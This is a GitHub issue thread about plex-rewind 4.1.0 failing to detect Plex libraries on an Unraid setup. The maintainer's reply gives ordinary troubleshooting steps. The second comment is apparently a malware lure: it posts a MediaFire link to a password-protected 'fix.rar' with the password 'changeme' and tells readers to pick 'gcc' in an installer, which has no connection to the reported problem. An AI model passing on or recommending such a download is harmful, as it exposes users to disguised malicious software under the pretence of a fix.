### ISSUE TITLE
Not detecting plex libraries

### ISSUE THREAD

**Issue by willowsokora** [RaunoT/plex-rewind#240]
### Plex Rewind Version

4.1.0

### Description

I just installed this on my Unraid server, pointed it at my Tautulli, Plex, and Overseerr instances, and the "Connection" tab is green, but the rest of the tabs in the setup are red and the "General" tab is saying it can't find any libraries in my plex server. I don't see anything aside from the startup messages in the logs, no errors, but I definitely have libraries! 

### Steps to reproduce

1. Install plex-rewind
2. Set up connections to other services
3. plex-rewind unable to find libraries

### Platform

desktop

### Device

Macbook Pro M1 Pro

### Operating System

Macos 14.5

### Browser and version

Safari 17.5

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by RaunoT** [comment]
Here's a few steps you could try:

1. Have you tried re-saving the "Connection" settings and do you get the "Settings saved!" success message?
2. Do you see your libraries listed in Tautulli under "Libraries"?
3. Did you use a local private IP address (e.g `192.168.1.1`) or a domain name instead of localhost?
4. Have you tried a hard refresh to clear any cache for fetch requests that may have been made - `option + cmd + e` and then `cmd + r` on macOS Safari?

The rest of the settings tabs will turn green once you save them for the first time.
